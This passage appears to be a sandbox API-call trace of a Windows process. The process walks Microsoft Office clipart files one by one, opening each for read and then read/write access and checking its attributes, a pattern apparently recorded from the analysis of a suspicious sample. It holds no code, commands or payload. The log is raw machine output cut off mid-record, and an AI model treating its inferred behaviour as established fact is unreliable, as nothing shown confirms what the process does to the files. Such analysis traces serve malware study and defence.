dwReserved1=0x77892bc0, cFileName="DD01166_.WMF", cAlternateFileName="")) returned 1 [0104.076] AreFileApisANSI () returned 1 [0104.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.076] AreFileApisANSI () returned 1 [0104.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.076] GetFileType (hFile=0x33c) returned 0x1 [0104.076] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.076] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.077] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.077] CloseHandle (hObject=0x33c) returned 1 [0104.077] AreFileApisANSI () returned 1 [0104.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.077] GetFileType (hFile=0x33c) returned 0x1 [0104.077] CloseHandle (hObject=0x33c) returned 1 [0104.077] AreFileApisANSI () returned 1 [0104.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820)) returned 1 [0104.077] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01167_.WMF", cAlternateFileName="")) returned 1 [0104.077] AreFileApisANSI () returned 1 [0104.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.078] AreFileApisANSI () returned 1 [0104.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.078] GetFileType (hFile=0x33c) returned 0x1 [0104.078] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.078] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.078] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.078] CloseHandle (hObject=0x33c) returned 1 [0104.147] AreFileApisANSI () returned 1 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.147] GetFileType (hFile=0x33c) returned 0x1 [0104.147] CloseHandle (hObject=0x33c) returned 1 [0104.147] AreFileApisANSI () returned 1 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.147] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820)) returned 1 [0104.147] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01168_.WMF", cAlternateFileName="")) returned 1 [0104.147] AreFileApisANSI () returned 1 [0104.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.147] AreFileApisANSI () returned 1 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.148] GetFileType (hFile=0x33c) returned 0x1 [0104.148] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.149] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.149] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.149] CloseHandle (hObject=0x33c) returned 1 [0104.149] AreFileApisANSI () returned 1 [0104.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.149] GetFileType (hFile=0x33c) returned 0x1 [0104.149] CloseHandle (hObject=0x33c) returned 1 [0104.149] AreFileApisANSI () returned 1 [0104.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.150] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d4)) returned 1 [0104.150] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01169_.WMF", cAlternateFileName="")) returned 1 [0104.150] AreFileApisANSI () returned 1 [0104.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.150] AreFileApisANSI () returned 1 [0104.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.150] GetFileType (hFile=0x33c) returned 0x1 [0104.150] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.150] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.150] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.150] CloseHandle (hObject=0x33c) returned 1 [0104.151] AreFileApisANSI () returned 1 [0104.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.151] GetFileType (hFile=0x33c) returned 0x1 [0104.151] CloseHandle (hObject=0x33c) returned 1 [0104.151] AreFileApisANSI () returned 1 [0104.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.151] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e4)) returned 1 [0104.151] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x964, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01170_.WMF", cAlternateFileName="")) returned 1 [0104.151] AreFileApisANSI () returned 1 [0104.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.151] AreFileApisANSI () returned 1 [0104.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.151] GetFileType (hFile=0x33c) returned 0x1 [0104.152] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.152] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.152] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.152] CloseHandle (hObject=0x33c) returned 1 [0104.152] AreFileApisANSI () returned 1 [0104.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.152] GetFileType (hFile=0x33c) returned 0x1 [0104.152] CloseHandle (hObject=0x33c) returned 1 [0104.152] AreFileApisANSI () returned 1 [0104.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.152] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x964)) returned 1 [0104.152] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01171_.WMF", cAlternateFileName="")) returned 1 [0104.153] AreFileApisANSI () returned 1 [0104.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.153] AreFileApisANSI () returned 1 [0104.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.153] GetFileType (hFile=0x33c) returned 0x1 [0104.153] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.153] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.154] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.154] CloseHandle (hObject=0x33c) returned 1 [0104.154] AreFileApisANSI () returned 1 [0104.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.154] GetFileType (hFile=0x33c) returned 0x1 [0104.154] CloseHandle (hObject=0x33c) returned 1 [0104.154] AreFileApisANSI () returned 1 [0104.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.154] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x804)) returned 1 [0104.154] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01172_.WMF", cAlternateFileName="")) returned 1 [0104.154] AreFileApisANSI () returned 1 [0104.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.155] AreFileApisANSI () returned 1 [0104.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.155] GetFileType (hFile=0x33c) returned 0x1 [0104.156] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.156] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.156] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.156] CloseHandle (hObject=0x33c) returned 1 [0104.156] AreFileApisANSI () returned 1 [0104.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.156] GetFileType (hFile=0x33c) returned 0x1 [0104.156] CloseHandle (hObject=0x33c) returned 1 [0104.156] AreFileApisANSI () returned 1 [0104.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.156] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b8)) returned 1 [0104.156] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, 